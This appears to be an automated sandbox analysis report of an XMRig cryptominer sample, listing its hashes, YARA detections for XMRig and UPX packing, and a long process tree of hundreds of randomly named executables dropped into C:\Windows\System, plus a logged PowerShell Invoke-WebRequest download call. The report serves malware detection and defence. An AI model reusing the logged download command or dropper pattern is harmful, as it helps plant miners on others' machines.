xmrig | 4f97a77c0a686ac2429d239f1c041c3dc1a9e96f9db82cb137000c2fc7443dd0

Analysis

max time kernel
20s
max time network
20s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
30/04/2024, 02:42

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

08d8b6a988490c2ffc8a31ad507b0131_JaffaCakes118.exe
Size

2.2MB
MD5

08d8b6a988490c2ffc8a31ad507b0131
SHA1

9396050ad7154523c6294f5bf43034a445b60b7c
SHA256

4f97a77c0a686ac2429d239f1c041c3dc1a9e96f9db82cb137000c2fc7443dd0
SHA512

a48e8603f82e1858f5d1a504fde42019be9cb5320ba6ea374048ecf83e10915d33a34d5cd7c9930b34fcf6cda257c00363bcccb7eb90fd745a7411af41c61fc2
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1Vr5s1PTl//aDE:NABF

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral2/memory/2544-245-0x00007FF6B60A0000-0x00007FF6B6492000-memory.dmp	xmrig
behavioral2/memory/2124-265-0x00007FF7AE3E0000-0x00007FF7AE7D2000-memory.dmp	xmrig
behavioral2/memory/3924-275-0x00007FF6FCDA0000-0x00007FF6FD192000-memory.dmp	xmrig
behavioral2/memory/2472-278-0x00007FF7D3130000-0x00007FF7D3522000-memory.dmp	xmrig
behavioral2/memory/3484-323-0x00007FF6D7E90000-0x00007FF6D8282000-memory.dmp	xmrig
behavioral2/memory/3644-329-0x00007FF7C3950000-0x00007FF7C3D42000-memory.dmp	xmrig
behavioral2/memory/2188-359-0x00007FF6BA7C0000-0x00007FF6BABB2000-memory.dmp	xmrig
behavioral2/memory/4460-362-0x00007FF70BCD0000-0x00007FF70C0C2000-memory.dmp	xmrig

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4548-0-0x00007FF707F10000-0x00007FF708302000-memory.dmp	upx
behavioral2/files/0x000a000000023bca-8.dat	upx
behavioral2/files/0x000a000000023bcb-19.dat	upx
behavioral2/files/0x000a000000023bcd-63.dat	upx
behavioral2/files/0x000a000000023bce-101.dat	upx
behavioral2/files/0x000a000000023bdd-100.dat	upx
behavioral2/files/0x0009000000023bfe-164.dat	upx
behavioral2/files/0x0009000000023bfd-191.dat	upx
behavioral2/memory/2544-245-0x00007FF6B60A0000-0x00007FF6B6492000-memory.dmp	upx
behavioral2/memory/2124-265-0x00007FF7AE3E0000-0x00007FF7AE7D2000-memory.dmp	upx
behavioral2/memory/3924-275-0x00007FF6FCDA0000-0x00007FF6FD192000-memory.dmp	upx
behavioral2/memory/2472-278-0x00007FF7D3130000-0x00007FF7D3522000-memory.dmp	upx
behavioral2/memory/3484-323-0x00007FF6D7E90000-0x00007FF6D8282000-memory.dmp	upx
behavioral2/memory/3644-329-0x00007FF7C3950000-0x00007FF7C3D42000-memory.dmp	upx
behavioral2/memory/2188-359-0x00007FF6BA7C0000-0x00007FF6BABB2000-memory.dmp	upx
behavioral2/memory/4460-362-0x00007FF70BCD0000-0x00007FF70C0C2000-memory.dmp	upx

C:\Users\Admin\AppData\Local\Temp\08d8b6a988490c2ffc8a31ad507b0131_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\08d8b6a988490c2ffc8a31ad507b0131_JaffaCakes118.exe"
1⤵
PID:4548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  PID:2984
- C:\Windows\System\RcwHqvS.exe
  C:\Windows\System\RcwHqvS.exe
  2⤵
  PID:2288
- C:\Windows\System\sRpEagN.exe
  C:\Windows\System\sRpEagN.exe
  2⤵
  PID:3600
- C:\Windows\System\MUhDpAl.exe
  C:\Windows\System\MUhDpAl.exe
  2⤵
  PID:2188
- C:\Windows\System\RTLvpDq.exe
  C:\Windows\System\RTLvpDq.exe
  2⤵
  PID:2124
- C:\Windows\System\xvfasDV.exe
  C:\Windows\System\xvfasDV.exe
  2⤵
  PID:1168
- C:\Windows\System\cFkSrqd.exe
  C:\Windows\System\cFkSrqd.exe
  2⤵
  PID:636
- C:\Windows\System\PKGjHnI.exe
  C:\Windows\System\PKGjHnI.exe
  2⤵
  PID:3584
- C:\Windows\System\CoSybMu.exe
  C:\Windows\System\CoSybMu.exe
  2⤵
  PID:6044
- C:\Windows\System\TkxxKfD.exe
  C:\Windows\System\TkxxKfD.exe
  2⤵
  PID:2488
- C:\Windows\System\bqtVpjG.exe
  C:\Windows\System\bqtVpjG.exe
  2⤵
  PID:5324
- C:\Windows\System\nVLPrYM.exe
  C:\Windows\System\nVLPrYM.exe
  2⤵
  PID:5288
- C:\Windows\System\pTbHWvn.exe
  C:\Windows\System\pTbHWvn.exe
  2⤵
  PID:5248
- C:\Windows\System\ddkfafj.exe
  C:\Windows\System\ddkfafj.exe
  2⤵
  PID:5172
- C:\Windows\System\aBmyBpF.exe
  C:\Windows\System\aBmyBpF.exe
  2⤵
  PID:5144
- C:\Windows\System\hPoomGn.exe
  C:\Windows\System\hPoomGn.exe
  2⤵
  PID:2388
- C:\Windows\System\XHIeaPJ.exe
  C:\Windows\System\XHIeaPJ.exe
  2⤵
  PID:2120
- C:\Windows\System\iStdCwb.exe
  C:\Windows\System\iStdCwb.exe
  2⤵
  PID:1384
- C:\Windows\System\zMgICAl.exe
  C:\Windows\System\zMgICAl.exe
  2⤵
  PID:1908
- C:\Windows\System\GlVbhNG.exe
  C:\Windows\System\GlVbhNG.exe
  2⤵
  PID:5348
- C:\Windows\System\GkXtPEo.exe
  C:\Windows\System\GkXtPEo.exe
  2⤵
  PID:5380
- C:\Windows\System\EGGvqxh.exe
  C:\Windows\System\EGGvqxh.exe
  2⤵
  PID:5468
- C:\Windows\System\PpsuWmv.exe
  C:\Windows\System\PpsuWmv.exe
  2⤵
  PID:5416
- C:\Windows\System\EIxaxGS.exe
  C:\Windows\System\EIxaxGS.exe
  2⤵
  PID:5520
- C:\Windows\System\wqIMmgY.exe
  C:\Windows\System\wqIMmgY.exe
  2⤵
  PID:5452
- C:\Windows\System\cewwbSR.exe
  C:\Windows\System\cewwbSR.exe
  2⤵
  PID:6148
- C:\Windows\System\uZtleFJ.exe
  C:\Windows\System\uZtleFJ.exe
  2⤵
  PID:6172
- C:\Windows\System\GuVjpSm.exe
  C:\Windows\System\GuVjpSm.exe
  2⤵
  PID:6196
- C:\Windows\System\KSUVClG.exe
  C:\Windows\System\KSUVClG.exe
  2⤵
  PID:6216
- C:\Windows\System\LgakGtB.exe
  C:\Windows\System\LgakGtB.exe
  2⤵
  PID:6240
- C:\Windows\System\XItfRFN.exe
  C:\Windows\System\XItfRFN.exe
  2⤵
  PID:6264
- C:\Windows\System\sSCJlvJ.exe
  C:\Windows\System\sSCJlvJ.exe
  2⤵
  PID:6340
- C:\Windows\System\qpSsEFq.exe
  C:\Windows\System\qpSsEFq.exe
  2⤵
  PID:6360
- C:\Windows\System\uZeuzFC.exe
  C:\Windows\System\uZeuzFC.exe
  2⤵
  PID:6384
- C:\Windows\System\MdxCqpz.exe
  C:\Windows\System\MdxCqpz.exe
  2⤵
  PID:6404
- C:\Windows\System\kWFYSSy.exe
  C:\Windows\System\kWFYSSy.exe
  2⤵
  PID:6428
- C:\Windows\System\OXuNXiP.exe
  C:\Windows\System\OXuNXiP.exe
  2⤵
  PID:6452
- C:\Windows\System\xDpFoAL.exe
  C:\Windows\System\xDpFoAL.exe
  2⤵
  PID:6496
- C:\Windows\System\VAZPRNw.exe
  C:\Windows\System\VAZPRNw.exe
  2⤵
  PID:6552
- C:\Windows\System\BNZqZBd.exe
  C:\Windows\System\BNZqZBd.exe
  2⤵
  PID:6576
- C:\Windows\System\OMslyTU.exe
  C:\Windows\System\OMslyTU.exe
  2⤵
  PID:6600
- C:\Windows\System\nyTcKZe.exe
  C:\Windows\System\nyTcKZe.exe
  2⤵
  PID:6620
- C:\Windows\System\qNcCAaT.exe
  C:\Windows\System\qNcCAaT.exe
  2⤵
  PID:6640
- C:\Windows\System\aqpduYC.exe
  C:\Windows\System\aqpduYC.exe
  2⤵
  PID:6664
- C:\Windows\System\VmyqxDU.exe
  C:\Windows\System\VmyqxDU.exe
  2⤵
  PID:6692
- C:\Windows\System\MrLZyTP.exe
  C:\Windows\System\MrLZyTP.exe
  2⤵
  PID:6708
- C:\Windows\System\WZbpcOp.exe
  C:\Windows\System\WZbpcOp.exe
  2⤵
  PID:6740
- C:\Windows\System\wyXONEN.exe
  C:\Windows\System\wyXONEN.exe
  2⤵
  PID:6764
- C:\Windows\System\TUTxmHK.exe
  C:\Windows\System\TUTxmHK.exe
  2⤵
  PID:6792
- C:\Windows\System\OlgDanY.exe
  C:\Windows\System\OlgDanY.exe
  2⤵
  PID:6812
- C:\Windows\System\IQFmqQQ.exe
  C:\Windows\System\IQFmqQQ.exe
  2⤵
  PID:6832
- C:\Windows\System\ITHhjBg.exe
  C:\Windows\System\ITHhjBg.exe
  2⤵
  PID:6852
- C:\Windows\System\KnSUYdz.exe
  C:\Windows\System\KnSUYdz.exe
  2⤵
  PID:6880
- C:\Windows\System\xFxZOgs.exe
  C:\Windows\System\xFxZOgs.exe
  2⤵
  PID:6904
- C:\Windows\System\JfQzUQn.exe
  C:\Windows\System\JfQzUQn.exe
  2⤵
  PID:6920
- C:\Windows\System\iBhNJtE.exe
  C:\Windows\System\iBhNJtE.exe
  2⤵
  PID:6944
- C:\Windows\System\pSelift.exe
  C:\Windows\System\pSelift.exe
  2⤵
  PID:6968
- C:\Windows\System\bfigSWl.exe
  C:\Windows\System\bfigSWl.exe
  2⤵
  PID:6992
- C:\Windows\System\aejEWFr.exe
  C:\Windows\System\aejEWFr.exe
  2⤵
  PID:7012
- C:\Windows\System\YXmRLMO.exe
  C:\Windows\System\YXmRLMO.exe
  2⤵
  PID:7144
- C:\Windows\System\Fngtlym.exe
  C:\Windows\System\Fngtlym.exe
  2⤵
  PID:7164
- C:\Windows\System\nWYeXFb.exe
  C:\Windows\System\nWYeXFb.exe
  2⤵
  PID:5804
- C:\Windows\System\kZyveiA.exe
  C:\Windows\System\kZyveiA.exe
  2⤵
  PID:5928
- C:\Windows\System\ihGablS.exe
  C:\Windows\System\ihGablS.exe
  2⤵
  PID:5996
- C:\Windows\System\nrhpheS.exe
  C:\Windows\System\nrhpheS.exe
  2⤵
  PID:6040
- C:\Windows\System\OehFbyE.exe
  C:\Windows\System\OehFbyE.exe
  2⤵
  PID:6088
- C:\Windows\System\byuZdWj.exe
  C:\Windows\System\byuZdWj.exe
  2⤵
  PID:5968
- C:\Windows\System\dGpJUbq.exe
  C:\Windows\System\dGpJUbq.exe
  2⤵
  PID:5832
- C:\Windows\System\dCaMdfB.exe
  C:\Windows\System\dCaMdfB.exe
  2⤵
  PID:732
- C:\Windows\System\aMDoNYL.exe
  C:\Windows\System\aMDoNYL.exe
  2⤵
  PID:4784
- C:\Windows\System\cgNUUYP.exe
  C:\Windows\System\cgNUUYP.exe
  2⤵
  PID:5296
- C:\Windows\System\szUlbDZ.exe
  C:\Windows\System\szUlbDZ.exe
  2⤵
  PID:764
- C:\Windows\System\qKilPbv.exe
  C:\Windows\System\qKilPbv.exe
  2⤵
  PID:1020
- C:\Windows\System\YmKkkLB.exe
  C:\Windows\System\YmKkkLB.exe
  2⤵
  PID:1420
- C:\Windows\System\hrWwshB.exe
  C:\Windows\System\hrWwshB.exe
  2⤵
  PID:5560
- C:\Windows\System\vHaJUOz.exe
  C:\Windows\System\vHaJUOz.exe
  2⤵
  PID:5544
- C:\Windows\System\gyQicPD.exe
  C:\Windows\System\gyQicPD.exe
  2⤵
  PID:6164
- C:\Windows\System\IxjqzSd.exe
  C:\Windows\System\IxjqzSd.exe
  2⤵
  PID:6212
- C:\Windows\System\TeYviSF.exe
  C:\Windows\System\TeYviSF.exe
  2⤵
  PID:6256
- C:\Windows\System\SqDHbTW.exe
  C:\Windows\System\SqDHbTW.exe
  2⤵
  PID:5104
- C:\Windows\System\exoJeVO.exe
  C:\Windows\System\exoJeVO.exe
  2⤵
  PID:6900
- C:\Windows\System\JtGsuAY.exe
  C:\Windows\System\JtGsuAY.exe
  2⤵
  PID:6980
- C:\Windows\System\hOVcSlm.exe
  C:\Windows\System\hOVcSlm.exe
  2⤵
  PID:6412
- C:\Windows\System\GqDaKYi.exe
  C:\Windows\System\GqDaKYi.exe
  2⤵
  PID:6484
- C:\Windows\System\OFQpTQL.exe
  C:\Windows\System\OFQpTQL.exe
  2⤵
  PID:7000
- C:\Windows\System\unYlmVH.exe
  C:\Windows\System\unYlmVH.exe
  2⤵
  PID:6520
- C:\Windows\System\DdPEGxW.exe
  C:\Windows\System\DdPEGxW.exe
  2⤵
  PID:6548
- C:\Windows\System\wQXIyhe.exe
  C:\Windows\System\wQXIyhe.exe
  2⤵
  PID:6656
- C:\Windows\System\dSUhgZS.exe
  C:\Windows\System\dSUhgZS.exe
  2⤵
  PID:6728
- C:\Windows\System\BkJFYBj.exe
  C:\Windows\System\BkJFYBj.exe
  2⤵
  PID:6772
- C:\Windows\System\kMRVFwk.exe
  C:\Windows\System\kMRVFwk.exe
  2⤵
  PID:7304
- C:\Windows\System\WtgrODB.exe
  C:\Windows\System\WtgrODB.exe
  2⤵
  PID:7324
- C:\Windows\System\FUUsGKK.exe
  C:\Windows\System\FUUsGKK.exe
  2⤵
  PID:7344
- C:\Windows\System\KrtIbJD.exe
  C:\Windows\System\KrtIbJD.exe
  2⤵
  PID:7364
- C:\Windows\System\sxyWSFp.exe
  C:\Windows\System\sxyWSFp.exe
  2⤵
  PID:7384
- C:\Windows\System\USgxOIb.exe
  C:\Windows\System\USgxOIb.exe
  2⤵
  PID:7408
- C:\Windows\System\FfFRcjj.exe
  C:\Windows\System\FfFRcjj.exe
  2⤵
  PID:7432
- C:\Windows\System\YrKXqIR.exe
  C:\Windows\System\YrKXqIR.exe
  2⤵
  PID:7452
- C:\Windows\System\QTgmxaO.exe
  C:\Windows\System\QTgmxaO.exe
  2⤵
  PID:7476
- C:\Windows\System\VMfWhdn.exe
  C:\Windows\System\VMfWhdn.exe
  2⤵
  PID:7496
- C:\Windows\System\HLDXVMK.exe
  C:\Windows\System\HLDXVMK.exe
  2⤵
  PID:7516
- C:\Windows\System\eCGnokN.exe
  C:\Windows\System\eCGnokN.exe
  2⤵
  PID:7540
- C:\Windows\System\wTHaFIr.exe
  C:\Windows\System\wTHaFIr.exe
  2⤵
  PID:7564
- C:\Windows\System\pQnpacR.exe
  C:\Windows\System\pQnpacR.exe
  2⤵
  PID:7588
- C:\Windows\System\EaQVGsg.exe
  C:\Windows\System\EaQVGsg.exe
  2⤵
  PID:7608
- C:\Windows\System\yrGaTBh.exe
  C:\Windows\System\yrGaTBh.exe
  2⤵
  PID:7628
- C:\Windows\System\BkkbFSP.exe
  C:\Windows\System\BkkbFSP.exe
  2⤵
  PID:7652
- C:\Windows\System\HTNSJSX.exe
  C:\Windows\System\HTNSJSX.exe
  2⤵
  PID:7668
- C:\Windows\System\SEQNYDJ.exe
  C:\Windows\System\SEQNYDJ.exe
  2⤵
  PID:7740
- C:\Windows\System\mfEVWzX.exe
  C:\Windows\System\mfEVWzX.exe
  2⤵
  PID:7760
- C:\Windows\System\RhCAoOW.exe
  C:\Windows\System\RhCAoOW.exe
  2⤵
  PID:7780
- C:\Windows\System\uihLYgE.exe
  C:\Windows\System\uihLYgE.exe
  2⤵
  PID:7804
- C:\Windows\System\IgUTNBp.exe
  C:\Windows\System\IgUTNBp.exe
  2⤵
  PID:7836
- C:\Windows\System\dVEkrBn.exe
  C:\Windows\System\dVEkrBn.exe
  2⤵
  PID:7856
- C:\Windows\System\txbPduv.exe
  C:\Windows\System\txbPduv.exe
  2⤵
  PID:7876
- C:\Windows\System\IMPBSmX.exe
  C:\Windows\System\IMPBSmX.exe
  2⤵
  PID:7896
- C:\Windows\System\XhSfukK.exe
  C:\Windows\System\XhSfukK.exe
  2⤵
  PID:7920
- C:\Windows\System\kwuuYSj.exe
  C:\Windows\System\kwuuYSj.exe
  2⤵
  PID:7940
- C:\Windows\System\prtyhcR.exe
  C:\Windows\System\prtyhcR.exe
  2⤵
  PID:7956
- C:\Windows\System\NtkLqcD.exe
  C:\Windows\System\NtkLqcD.exe
  2⤵
  PID:7976
- C:\Windows\System\hfYwBGD.exe
  C:\Windows\System\hfYwBGD.exe
  2⤵
  PID:8000
- C:\Windows\System\SYnoylE.exe
  C:\Windows\System\SYnoylE.exe
  2⤵
  PID:8024
- C:\Windows\System\QKaxbeC.exe
  C:\Windows\System\QKaxbeC.exe
  2⤵
  PID:8044
- C:\Windows\System\FcNRPJi.exe
  C:\Windows\System\FcNRPJi.exe
  2⤵
  PID:8072
- C:\Windows\System\zcZtkXM.exe
  C:\Windows\System\zcZtkXM.exe
  2⤵
  PID:8104
- C:\Windows\System\ZxgaISj.exe
  C:\Windows\System\ZxgaISj.exe
  2⤵
  PID:8180
- C:\Windows\System\fFUtCdB.exe
  C:\Windows\System\fFUtCdB.exe
  2⤵
  PID:7140
- C:\Windows\System\jLHolZs.exe
  C:\Windows\System\jLHolZs.exe
  2⤵
  PID:5884
- C:\Windows\System\csRBRbU.exe
  C:\Windows\System\csRBRbU.exe
  2⤵
  PID:6004
- C:\Windows\System\cdUfsef.exe
  C:\Windows\System\cdUfsef.exe
  2⤵
  PID:5924
- C:\Windows\System\LkGJDYJ.exe
  C:\Windows\System\LkGJDYJ.exe
  2⤵
  PID:7156
- C:\Windows\System\OMqEQQV.exe
  C:\Windows\System\OMqEQQV.exe
  2⤵
  PID:844
- C:\Windows\System\XwXlQcF.exe
  C:\Windows\System\XwXlQcF.exe
  2⤵
  PID:5252
- C:\Windows\System\RlPVfLi.exe
  C:\Windows\System\RlPVfLi.exe
  2⤵
  PID:644
- C:\Windows\System\WQVkpig.exe
  C:\Windows\System\WQVkpig.exe
  2⤵
  PID:5432
- C:\Windows\System\oRLosPf.exe
  C:\Windows\System\oRLosPf.exe
  2⤵
  PID:5680
- C:\Windows\System\TswPXNm.exe
  C:\Windows\System\TswPXNm.exe
  2⤵
  PID:6860
- C:\Windows\System\cpBZPeK.exe
  C:\Windows\System\cpBZPeK.exe
  2⤵
  PID:6584
- C:\Windows\System\BIqQPwh.exe
  C:\Windows\System\BIqQPwh.exe
  2⤵
  PID:6704
- C:\Windows\System\eXadWYl.exe
  C:\Windows\System\eXadWYl.exe
  2⤵
  PID:376
- C:\Windows\System\AknoHbb.exe
  C:\Windows\System\AknoHbb.exe
  2⤵
  PID:4416
- C:\Windows\System\BoNdziL.exe
  C:\Windows\System\BoNdziL.exe
  2⤵
  PID:7492
- C:\Windows\System\rQPFkRc.exe
  C:\Windows\System\rQPFkRc.exe
  2⤵
  PID:7552
- C:\Windows\System\YvJqwNR.exe
  C:\Windows\System\YvJqwNR.exe
  2⤵
  PID:7404
- C:\Windows\System\BzVCkPa.exe
  C:\Windows\System\BzVCkPa.exe
  2⤵
  PID:7904
- C:\Windows\System\otFSwMi.exe
  C:\Windows\System\otFSwMi.exe
  2⤵
  PID:4296
- C:\Windows\System\FeUxpEv.exe
  C:\Windows\System\FeUxpEv.exe
  2⤵
  PID:7460
- C:\Windows\System\GPCLNHE.exe
  C:\Windows\System\GPCLNHE.exe
  2⤵
  PID:7968
- C:\Windows\System\gkQGWVi.exe
  C:\Windows\System\gkQGWVi.exe
  2⤵
  PID:7600
- C:\Windows\System\OIRDiuv.exe
  C:\Windows\System\OIRDiuv.exe
  2⤵
  PID:7624
- C:\Windows\System\ShznNKs.exe
  C:\Windows\System\ShznNKs.exe
  2⤵
  PID:7312
- C:\Windows\System\VgYuCIz.exe
  C:\Windows\System\VgYuCIz.exe
  2⤵
  PID:7340
- C:\Windows\System\aAgdcZM.exe
  C:\Windows\System\aAgdcZM.exe
  2⤵
  PID:5760
- C:\Windows\System\hrzZAzv.exe
  C:\Windows\System\hrzZAzv.exe
  2⤵
  PID:8036
- C:\Windows\System\rWUUsHP.exe
  C:\Windows\System\rWUUsHP.exe
  2⤵
  PID:4056
- C:\Windows\System\hEHedvj.exe
  C:\Windows\System\hEHedvj.exe
  2⤵
  PID:1612
- C:\Windows\System\eNTDJXS.exe
  C:\Windows\System\eNTDJXS.exe
  2⤵
  PID:7708
- C:\Windows\System\PUSFAah.exe
  C:\Windows\System\PUSFAah.exe
  2⤵
  PID:7732
- C:\Windows\System\IncWpDQ.exe
  C:\Windows\System\IncWpDQ.exe
  2⤵
  PID:7800
- C:\Windows\System\mqBIynN.exe
  C:\Windows\System\mqBIynN.exe
  2⤵
  PID:7928
- C:\Windows\System\oqlVDUe.exe
  C:\Windows\System\oqlVDUe.exe
  2⤵
  PID:8200
- C:\Windows\System\xGObLxy.exe
  C:\Windows\System\xGObLxy.exe
  2⤵
  PID:8232
- C:\Windows\System\alxKzkB.exe
  C:\Windows\System\alxKzkB.exe
  2⤵
  PID:8248
- C:\Windows\System\ZCSrpIe.exe
  C:\Windows\System\ZCSrpIe.exe
  2⤵
  PID:8276
- C:\Windows\System\WeYqrTO.exe
  C:\Windows\System\WeYqrTO.exe
  2⤵
  PID:8296
- C:\Windows\System\aQNFYhY.exe
  C:\Windows\System\aQNFYhY.exe
  2⤵
  PID:8320
- C:\Windows\System\mrBTvnf.exe
  C:\Windows\System\mrBTvnf.exe
  2⤵
  PID:8360
- C:\Windows\System\vykEoBW.exe
  C:\Windows\System\vykEoBW.exe
  2⤵
  PID:8380
- C:\Windows\System\lZIYvYy.exe
  C:\Windows\System\lZIYvYy.exe
  2⤵
  PID:8404
- C:\Windows\System\QkoXpEr.exe
  C:\Windows\System\QkoXpEr.exe
  2⤵
  PID:8424
- C:\Windows\System\OucVSYn.exe
  C:\Windows\System\OucVSYn.exe
  2⤵
  PID:8440
- C:\Windows\System\QNKFmDa.exe
  C:\Windows\System\QNKFmDa.exe
  2⤵
  PID:8512
- C:\Windows\System\yyELCsw.exe
  C:\Windows\System\yyELCsw.exe
  2⤵
  PID:8532
- C:\Windows\System\VdXMeDc.exe
  C:\Windows\System\VdXMeDc.exe
  2⤵
  PID:8556
- C:\Windows\System\zFhdiNP.exe
  C:\Windows\System\zFhdiNP.exe
  2⤵
  PID:8584
- C:\Windows\System\htaIiJk.exe
  C:\Windows\System\htaIiJk.exe
  2⤵
  PID:8604
- C:\Windows\System\tCJPiTC.exe
  C:\Windows\System\tCJPiTC.exe
  2⤵
  PID:8628
- C:\Windows\System\ruUKNGt.exe
  C:\Windows\System\ruUKNGt.exe
  2⤵
  PID:8656
- C:\Windows\System\UZogMtP.exe
  C:\Windows\System\UZogMtP.exe
  2⤵
  PID:8672
- C:\Windows\System\gCEzWPh.exe
  C:\Windows\System\gCEzWPh.exe
  2⤵
  PID:8700
- C:\Windows\System\heJaYvF.exe
  C:\Windows\System\heJaYvF.exe
  2⤵
  PID:8720
- C:\Windows\System\NmvyJiT.exe
  C:\Windows\System\NmvyJiT.exe
  2⤵
  PID:8744
- C:\Windows\System\IUYDISH.exe
  C:\Windows\System\IUYDISH.exe
  2⤵
  PID:8768
- C:\Windows\System\hgShWEy.exe
  C:\Windows\System\hgShWEy.exe
  2⤵
  PID:8792
- C:\Windows\System\elaAOjc.exe
  C:\Windows\System\elaAOjc.exe
  2⤵
  PID:8812
- C:\Windows\System\gZpTxvZ.exe
  C:\Windows\System\gZpTxvZ.exe
  2⤵
  PID:8836
- C:\Windows\System\kusXoop.exe
  C:\Windows\System\kusXoop.exe
  2⤵
  PID:8860
- C:\Windows\System\VaJTVJM.exe
  C:\Windows\System\VaJTVJM.exe
  2⤵
  PID:8884
- C:\Windows\System\WFxAsmC.exe
  C:\Windows\System\WFxAsmC.exe
  2⤵
  PID:8904
- C:\Windows\System\FevXdAn.exe
  C:\Windows\System\FevXdAn.exe
  2⤵
  PID:8928
- C:\Windows\System\NyDtcrN.exe
  C:\Windows\System\NyDtcrN.exe
  2⤵
  PID:8956
- C:\Windows\System\NsSRkGH.exe
  C:\Windows\System\NsSRkGH.exe
  2⤵
  PID:9016
- C:\Windows\System\dNFgOUl.exe
  C:\Windows\System\dNFgOUl.exe
  2⤵
  PID:9036
- C:\Windows\System\hdWjFNX.exe
  C:\Windows\System\hdWjFNX.exe
  2⤵
  PID:9052
- C:\Windows\System\wNRtkab.exe
  C:\Windows\System\wNRtkab.exe
  2⤵
  PID:9068
- C:\Windows\System\PrLKRUM.exe
  C:\Windows\System\PrLKRUM.exe
  2⤵
  PID:9088
- C:\Windows\System\nIGycVx.exe
  C:\Windows\System\nIGycVx.exe
  2⤵
  PID:9112
- C:\Windows\System\RxSZgbF.exe
  C:\Windows\System\RxSZgbF.exe
  2⤵
  PID:9132
- C:\Windows\System\dUxzfGE.exe
  C:\Windows\System\dUxzfGE.exe
  2⤵
  PID:9156
- C:\Windows\System\cLRPVUb.exe
  C:\Windows\System\cLRPVUb.exe
  2⤵
  PID:9184
- C:\Windows\System\xgamFvA.exe
  C:\Windows\System\xgamFvA.exe
  2⤵
  PID:9212
- C:\Windows\System\pMUQMJh.exe
  C:\Windows\System\pMUQMJh.exe
  2⤵
  PID:7400
- C:\Windows\System\KwBLlZR.exe
  C:\Windows\System\KwBLlZR.exe
  2⤵
  PID:7932
- C:\Windows\System\sLHvytR.exe
  C:\Windows\System\sLHvytR.exe
  2⤵
  PID:7964
- C:\Windows\System\WuMKNFE.exe
  C:\Windows\System\WuMKNFE.exe
  2⤵
  PID:7372
- C:\Windows\System\vWZBXTN.exe
  C:\Windows\System\vWZBXTN.exe
  2⤵
  PID:8152
- C:\Windows\System\vgrJdki.exe
  C:\Windows\System\vgrJdki.exe
  2⤵
  PID:8188
- C:\Windows\System\EwtZApR.exe
  C:\Windows\System\EwtZApR.exe
  2⤵
  PID:6128
- C:\Windows\System\YnemLYZ.exe
  C:\Windows\System\YnemLYZ.exe
  2⤵
  PID:7912
- C:\Windows\System\Smzmfvk.exe
  C:\Windows\System\Smzmfvk.exe
  2⤵
  PID:7536
- C:\Windows\System\iWuWXjp.exe
  C:\Windows\System\iWuWXjp.exe
  2⤵
  PID:8256
- C:\Windows\System\JBlGiZp.exe
  C:\Windows\System\JBlGiZp.exe
  2⤵
  PID:7512
- C:\Windows\System\nCODivp.exe
  C:\Windows\System\nCODivp.exe
  2⤵
  PID:8448
- C:\Windows\System\YXUCWsP.exe
  C:\Windows\System\YXUCWsP.exe
  2⤵
  PID:6752
- C:\Windows\System\aHbhQuV.exe
  C:\Windows\System\aHbhQuV.exe
  2⤵
  PID:4892
- C:\Windows\System\JyTAewU.exe
  C:\Windows\System\JyTAewU.exe
  2⤵
  PID:8592
- C:\Windows\System\KrgGxUs.exe
  C:\Windows\System\KrgGxUs.exe
  2⤵
  PID:8636
- C:\Windows\System\RnFvhIm.exe
  C:\Windows\System\RnFvhIm.exe
  2⤵
  PID:8664
- C:\Windows\System\UXxoyoq.exe
  C:\Windows\System\UXxoyoq.exe
  2⤵
  PID:8764
- C:\Windows\System\zNXzRvL.exe
  C:\Windows\System\zNXzRvL.exe
  2⤵
  PID:8852
- C:\Windows\System\kxYDYSL.exe
  C:\Windows\System\kxYDYSL.exe
  2⤵
  PID:8920
- C:\Windows\System\BlydJVw.exe
  C:\Windows\System\BlydJVw.exe
  2⤵
  PID:8376
- C:\Windows\System\snzlKch.exe
  C:\Windows\System\snzlKch.exe
  2⤵
  PID:7676
- C:\Windows\System\xsgnzDt.exe
  C:\Windows\System\xsgnzDt.exe
  2⤵
  PID:5880
- C:\Windows\System\miJfPjZ.exe
  C:\Windows\System\miJfPjZ.exe
  2⤵
  PID:6848
- C:\Windows\System\DjTAaaS.exe
  C:\Windows\System\DjTAaaS.exe
  2⤵
  PID:7636
- C:\Windows\System\mFpKAXW.exe
  C:\Windows\System\mFpKAXW.exe
  2⤵
  PID:7720
- C:\Windows\System\KahtMhH.exe
  C:\Windows\System\KahtMhH.exe
  2⤵
  PID:9084
- C:\Windows\System\GcbFoXj.exe
  C:\Windows\System\GcbFoXj.exe
  2⤵
  PID:9128
- C:\Windows\System\DWXcTEn.exe
  C:\Windows\System\DWXcTEn.exe
  2⤵
  PID:8780
- C:\Windows\System\psnbWpf.exe
  C:\Windows\System\psnbWpf.exe
  2⤵
  PID:8292
- C:\Windows\System\jbroteQ.exe
  C:\Windows\System\jbroteQ.exe
  2⤵
  PID:7472
- C:\Windows\System\CxVJunH.exe
  C:\Windows\System\CxVJunH.exe
  2⤵
  PID:8144
- C:\Windows\System\CCsFkyM.exe
  C:\Windows\System\CCsFkyM.exe
  2⤵
  PID:1764
- C:\Windows\System\YIpTSXk.exe
  C:\Windows\System\YIpTSXk.exe
  2⤵
  PID:9228
- C:\Windows\System\wZvCRIf.exe
  C:\Windows\System\wZvCRIf.exe
  2⤵
  PID:9256
- C:\Windows\System\XXbWYWP.exe
  C:\Windows\System\XXbWYWP.exe
  2⤵
  PID:9272
- C:\Windows\System\KfkoVZp.exe
  C:\Windows\System\KfkoVZp.exe
  2⤵
  PID:9288
- C:\Windows\System\VbltBzF.exe
  C:\Windows\System\VbltBzF.exe
  2⤵
  PID:9312
- C:\Windows\System\ZjOGwrp.exe
  C:\Windows\System\ZjOGwrp.exe
  2⤵
  PID:9332
- C:\Windows\System\VAeeAPy.exe
  C:\Windows\System\VAeeAPy.exe
  2⤵
  PID:9356
- C:\Windows\System\BjiPZfy.exe
  C:\Windows\System\BjiPZfy.exe
  2⤵
